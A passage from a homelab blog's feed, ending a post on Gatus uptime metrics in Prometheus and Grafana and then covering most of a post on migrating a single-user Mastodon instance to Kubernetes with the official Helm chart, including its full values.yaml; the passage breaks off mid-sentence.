gatus_results_certificate_expiration_seconds{group=&#34;Infra&#34;,key=&#34;infra_infra:-mei-home-net-cert&#34;,name=&#34;Infra: mei-home.net cert&#34;,type=&#34;HTTP&#34;} 3.276935592538658e+06
# HELP gatus_results_endpoint_success Displays whether or not the endpoint was a success
# TYPE gatus_results_endpoint_success gauge
gatus_results_endpoint_success{group=&#34;Hosts&#34;,key=&#34;hosts_host:-foobar&#34;,name=&#34;Host: Foobar&#34;,type=&#34;ICMP&#34;} 1
</code></pre><p>Armed with this information, I set up a new static scrape for my <a href="https://blog.mei-home.net/posts/k8s-migration-9-prometheus/">Prometheus deployment</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-gatus</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-gatus</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;gatus.gatus.svc.cluster.local:8080&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricsPath</span>: <span style="color:#e6db74">&#34;/metrics&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scrapeInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sourceLabels</span>: [<span style="color:#e6db74">&#34;__name__&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;go_.*&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sourceLabels</span>: [<span style="color:#e6db74">&#34;__name__&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;promhttp_.*&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sourceLabels</span>: [<span style="color:#e6db74">&#34;__name__&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;process_.*&#39;</span>
</span></span></code></pre></div><p>Nothing special to see, besides filtering out some app metrics I never look at
anyway.</p>
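<p>As an aside, the three drop rules could presumably also be collapsed into a single
one with an alternating regex, something along these lines:</p>
<pre tabindex="0"><code>metricRelabelings:
  - action: drop
    sourceLabels: [&#34;__name__&#34;]
    regex: &#39;(go|promhttp|process)_.*&#39;
</code></pre>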
<p>Finally, I use that data in a <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/state-timeline/">Grafana state timeline visualization</a>:
<figure>
    <img loading="lazy" src="state-timeline.png"
         alt="A screenshot of a Grafana state timeline panel. On the left, it shows a number of service names, like &#39;Gitea&#39; or &#39;Jellyfin&#39;. To the right of each service name is a mostly green line, for some services interrupted by short intervals of red. "/> <figcaption>
            <p>Service uptime panel in my Homelab dashboard.</p>
        </figcaption>
</figure>
</p>
<p>The panel is driven by this Prometheus query:</p>
<pre tabindex="0"><code>gatus_results_endpoint_success
</code></pre><p>Yupp, as simple as that.
In addition, I&rsquo;m using Gatus&rsquo; certificate expiry metrics to drive a <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/stat/">stat panel</a>:
<figure>
    <img loading="lazy" src="cert-expiry.png"
         alt="A screenshot of a Grafana stat panel. It is headed &#39;Cert Valid for&#39; and currently shows &#39;5.42 weeks&#39; in green."/> <figcaption>
            <p>Stat panel for my public cert expiry.</p>
        </figcaption>
</figure>

It is driven by this PromQL query:</p>
<pre tabindex="0"><code>gatus_results_certificate_expiration_seconds{name=&#34;Infra: mei-home.net cert&#34;}
</code></pre><h2 id="conclusion">Conclusion</h2>
<p>And this concludes the Uptime Kuma to Gatus switch post. This post also marks
the end of phase 1 of the Nomad to k8s migration. Uptime Kuma was the last service
left on Nomad; after it, only infrastructure jobs like CSI plugins and
a Traefik ingress were still running.
I would say that in total, this first phase of setting up the k8s cluster itself and
Rook Ceph, and then migrating all services over, cost me about six months. I got
started in earnest towards Christmas 2023, and then worked away at it until about
April, when I was rudely interrupted by my backup setup not being viable for
k8s. I then finally got back into it a couple of months ago, in the beginning
of 2025.</p>
<p>The next steps will be completely decommissioning the Nomad cluster and migrating
the baremetal Ceph hosts over to the Rook Ceph cluster. The work is pretty
mechanical at the moment, with all of the cleanups, so the next blog post might
take a while. I mean, unless something explodes in my face in an amusing way. &#x1f605; Although I might hold a wake for my HashiCorp Nomad cluster once
I&rsquo;ve fully taken it down.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 20: Migrating Mastodon</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-20-mastodon/</link>
      <pubDate>Thu, 06 Mar 2025 22:45:05 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-20-mastodon/</guid>
      <description>Migrating my Mastodon instance to k8s with the official Helm chart</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Mastodon instance to the k8s cluster.</p>
<p>This is part 21 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p><a href="https://github.com/mastodon/mastodon">Mastodon</a> is currently serving as my
presence in the <a href="https://fediverse.party/en/fediverse/">Fediverse</a>. You can
find me <a href="https://social.mei-home.net/@mmeier">here</a>, although I&rsquo;m pretty sure
that most of my readers are coming from there already. &#x1f604;</p>
<p>If you&rsquo;re at all interested in joining a genuine community around Homelabbing,
I can only recommend joining the fun by following the HomeLab or SelfHosted
hashtags and wildly following everyone appearing on there. It&rsquo;s a great community
of rather friendly people enjoying everything from a lonely Pi to several
42U 19&quot; racks full of equipment. If you&rsquo;re interested in learning more about
my own experience with the Fediverse and hosting my own single-user instance,
have a look at <a href="https://blog.mei-home.net/tags/fediverse/">these older posts</a>.</p>
<h2 id="preparations">Preparations</h2>
<p>There were two things which needed to be migrated from my Nomad cluster to
the k8s deployment: The S3 bucket holding all of the media, and the database.</p>
<p>The database is, by a very large margin, the biggest in my Homelab, clocking in
at 2.5 GB. I think it could be a lot smaller, but I completely disabled cleanups
for remote posts a while ago. That was because the automated cleanup
also deletes posts I had bookmarked for reading later, and I&rsquo;m not very good
at actually keeping up with those - at some point I went through my bookmarks and
became pretty convinced that some posts I had saved a while ago were missing.
I will likely do some cleanups manually when the database really becomes too big to be
manageable.</p>
<p>I will not describe the entire migration process here, because it is similar to
previous migrations. If you&rsquo;re interested, have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-16-gitea/#database-setup-and-migration">my post about the Gitea
migration</a>,
where I describe the database migration with <a href="https://cloudnative-pg.io/">CNPG</a>
in detail.
In short, it was very painless. I provided the database with a 15 GB volume,
which seems a bit overboard in hindsight. At some point in the future I will
have to figure out how to do database sizing and go through all of my CNPG
clusters, because I&rsquo;m pretty sure most of them are overprovisioned.</p>
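<p>For a rough idea of what such a CNPG cluster looks like, here is a minimal sketch
(the name and sizing are illustrative, not my actual manifest):</p>
<pre tabindex="0"><code>apiVersion: postgresql.cnpg.io/v1
kind: Cluster
metadata:
  name: mastodon-pg
spec:
  instances: 1
  storage:
    size: 15Gi
</code></pre>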
<p>Next came the S3 bucket. The first mistake I made here was forgetting to
exclude the <code>cache/</code> prefix. So I copied all of the currently cached media over
instead of just letting Mastodon re-fetch whatever it actually needed. That
prefix currently holds 56 GB out of 61 GB total. Which reminds me that I need to
check whether the automatic cleanup is working on the k8s setup or not.
But yeah, if I had remembered to exclude that prefix, I could have saved a lot
of time on the copy operation. As it stands, these are the stats for the copy,
which I did with <a href="https://rclone.org/">rclone</a>:</p>
<pre tabindex="0"><code>Transferred:       61.786 GiB / 61.786 GiB, 100%, 6.279 MiB/s, ETA 0s
Transferred:       384921 / 384921, 100%
Elapsed time:    3h7m29.8s
</code></pre><p>Those 6.279 MiB/s are utterly abysmal. Those of you who read my previous post
on <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">my media library copy operation</a>
probably already know: It was the 4 TB Seagate HDD, which was fully slammed again.
There&rsquo;s definitely something wrong with this disk.
But anyway, three hours later I was done and had everything copied over.</p>
<p>Before I close the preparations, let&rsquo;s have some fun and look at the CPU usage
of the FluentD container in my k8s cluster:
<figure>
    <img loading="lazy" src="fluentd-usage.png"
         alt="A screenshot of a Grafana time series plot. It&#39;s showing the CPU usage, given on the Y axis in &#39;cores&#39;, of my FluentD instance over the three hours from 09:55 to 13:10 where the S3 bucket was copied. It hovers at 0.1 in the beginning and end, but goes up to 0.4, with spikes to 0.5 between 09:55 and 13:10, before then going down again."/> <figcaption>
            <p>CPU usage of my FluentD log aggregation container.</p>
        </figcaption>
</figure>

Not even the RGW or OSD containers were using more CPU during the copy. The reason
seems to be that I&rsquo;ve still got my ingress Traefik instance set to debug log level:
<figure>
    <img loading="lazy" src="traefik-log-rate.png"
         alt="A screenshot of a Grafana time series plot. It shows the log rate of my Traefik ingress container during the S3 bucket copy. The rate goes from about 1 log entry per second to over 70 per second, where it stays throughout the copy operation, before finally going back to about 1 per second."/> <figcaption>
            <p>Log rate of my Traefik ingress container.</p>
        </figcaption>
</figure>

I&rsquo;m now starting to wonder whether this might be part of the reason for why the
copy was so slow - the disk might have also been loaded by Loki pushing all these
log lines to its own S3 bucket. &#x1f926;
Sadly, I don&rsquo;t have precise enough metrics for that, as I can only see the
throughput by pool in my Ceph stats, and both the Mastodon bucket and the Loki
bucket are in the same pool.
Something to try to dig into a little bit later.</p>
<h2 id="the-mastodon-setup">The Mastodon setup</h2>
<p>I deployed my Mastodon instance with the <a href="https://github.com/mastodon/chart">official Mastodon chart</a>.
One important note: This one is, at some point in the future, going to be replaced
with <a href="https://github.com/mastodon/helm-charts">a new one</a>, see the <a href="https://github.com/mastodon/chart/issues/129">relevant issue</a>.</p>
<p>I won&rsquo;t go through every single option I set, but there were a couple of things
which tripped me up.</p>
<p>The first and perhaps most important one: The default <code>appVersion</code> of the current
chart is <code>4.2.17</code>, but I was already on <code>4.3.3</code>. The main issue I encountered
due to this version discrepancy was the split of the Mastodon container
into two containers, one for the streaming component, and one for everything
else. To fix this, I had to explicitly set the image in the <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">streaming</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">repository</span>: <span style="color:#e6db74">&#34;ghcr.io/mastodon/mastodon-streaming&#34;</span>
</span></span></code></pre></div><p>With that, the chart seems to work for 4.3.3 and 4.3.4 without issues.</p>
<p>Then there&rsquo;s the Redis configuration. I&rsquo;ve got a central Redis instance in my
cluster, instead of running one for every app. And the chart supports this, but
unless I&rsquo;ve overlooked something here, the chart requires the Redis instance
to have a password, which mine does not. The way this manifests is that the
<code>mastodon-redis</code> secret is unconditionally added to each container&rsquo;s env,
for example in the mastodon-web deployment from <a href="https://github.com/mastodon/chart/blob/main/templates/deployment-web.yaml">here</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;REDIS_PASSWORD&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: {{ <span style="color:#ae81ff">template &#34;mastodon.redis.secretName&#34; . }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">redis-password</span>
</span></span></code></pre></div><p>There&rsquo;s no condition around that which checks whether Redis is configured with a
password. I also tried to just set an empty password in <code>redis.auth.password</code>,
but in this case the Secret is not created by the chart, and my containers are
left in CreateContainerConfigError state because of the missing Secret.
The only way I found was to create a dummy secret with an empty <code>data.redis-password</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">masto-redis-mock</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">type</span>: <span style="color:#ae81ff">Opaque</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis-password</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>And then using that Secret in the Helm chart:</p>
<pre tabindex="0"><code>redis:
  auth:
    existingSecret: &#34;masto-redis-mock&#34;
</code></pre><p>With that, the Redis password env variable is set, but to an empty value, which
seems to make Mastodon use Redis properly, without adding a password of any
kind to the connection string.</p>
<p>The next noteworthy configuration to be set was the <code>mastodon.trusted_proxy_ip</code>
variable. This one needed the source IP of my Traefik ingress, but that doesn&rsquo;t
have a fixed IP, so I needed to add the Pod CIDR:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">trusted_proxy_ip</span>: <span style="color:#e6db74">&#34;300.300.300.1,127.0.0.1,10.8.0.0/16&#34;</span>
</span></span></code></pre></div><p>Without this setting, I got the following error in the mastodon-web logs:</p>
<pre tabindex="0"><code>[05332434-d3d6-40b1-950d-ae73da0d4967] ActionDispatch::RemoteIp::IpSpoofAttackError (IP spoofing attack?! client 10.8.4.103 is not a trusted proxy HTTP_CLIENT_IP=nil HTTP_X_FORWARDED_FOR=&#34;67.241.47.40, 10.86.10.10&#34;)
</code></pre><p>I also decided to switch off the CronJob for media removal:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">removeMedia</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>This is because I recently <a href="https://blog.mei-home.net/posts/mastodon-media-cache-cleanup-issue/">spent quite some time</a>
digging into Mastodon&rsquo;s internal media cleanup process. From what I can see, this CronJob
uses the <code>tootctl</code> CLI with the <a href="https://docs.joinmastodon.org/admin/tootctl/#media-remove">tootctl media remove</a>
command. I prefer that over the internal Mastodon process: back
when I looked at it, <code>tootctl</code> worked a lot better because it made separate
DELETE requests. But the one thing which keeps me from using the CronJob is that
I can&rsquo;t configure the retention periods. I might still use it later and just live
with the defaults.</p>
<p>And that&rsquo;s really all I have to say. For completeness&rsquo; sake, here is the full
<code>values.yaml</code> content:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">createAdmin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">removeMedia</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">local_domain</span>: <span style="color:#e6db74">&#34;social.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">trusted_proxy_ip</span>: <span style="color:#e6db74">&#34;300.300.300.1,127.0.0.1,10.8.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">singleUserMode</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">authorizedFetch</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limitedFederationMode</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">s3</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-bucket&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">masto-media</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">endpoint</span>: <span style="color:#e6db74">&#34;http://rook.service:80&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alias_host</span>: <span style="color:#e6db74">&#34;s3-mastodon.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">deepl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hcaptcha</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secrets</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-secrets&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidekiq</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1024Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">smtp</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth_method</span>: <span style="color:#e6db74">&#34;plain&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">from_address</span>: <span style="color:#e6db74">&#34;Meiers Mastodon &lt;mastodon@mei-home.net&gt;&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">openssl_verify_mode</span>: <span style="color:#e6db74">&#34;peer&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;mail.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tls</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-mail&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">streaming</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">repository</span>: <span style="color:#e6db74">&#34;ghcr.io/mastodon/mastodon-streaming&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">2000Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1000Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cacheBuster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">statsd</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exporter</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">otel</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraEnvVars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">SMTP_SSL</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_CLIENT_ID</span>: <span style="color:#e6db74">&#34;mastodon&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_DISPLAY_NAME</span>: <span style="color:#e6db74">&#34;Login with Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_ISSUER</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_DISCOVERY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_SCOPE</span>: <span style="color:#e6db74">&#34;openid,profile,email&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_UID_FIELD</span>: <span style="color:#e6db74">&#34;preferred_username&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_REDIRECT_URI</span>: <span style="color:#e6db74">&#34;https://social.mei-home.net/auth/auth/openid_connect/callback&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_SECURITY_ASSUME_EMAIL_IS_VERIFIED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_END_SESSION_ENDPOINT</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example/protocol/openid-connect/logout&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OMNIAUTH_ONLY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">RAILS_SERVE_STATIC_FILES</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">S3_BATCH_DELETE_LIMIT</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">S3_READ_TIMEOUT</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">S3_BATCH_DELETE_RETRY</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ALLOWED_PRIVATE_ADDRESSES</span>: <span style="color:#e6db74">&#34;300.300.300.1&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/controller</span>: <span style="color:#e6db74">&#34;none&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">social.mei-home.net</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">streaming</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">elasticsearch</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresqlHostname</span>: <span style="color:#e6db74">&#34;mastodon-pg-cluster-rw&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresqlPort</span>: <span style="color:#e6db74">&#34;5432&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>: <span style="color:#e6db74">&#34;mastodon&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;mastodon&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-pg-cluster-app&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hostname</span>: <span style="color:#e6db74">&#34;redis.example&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;6379&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;masto-redis-mock&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidekiq</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><h2 id="conclusion">Conclusion</h2>
<p>To be honest, somewhere during that Sunday I started thinking that starting the
Mastodon migration on a Sunday morning might have been a mistake, but in the end
it worked out well enough.</p>
<p>Now there are only a few services left to migrate over, chief amongst them
my Keycloak instance. Let&rsquo;s see whether I might even be able to clean out the
entire cluster during this weekend. There&rsquo;s definitely a light at
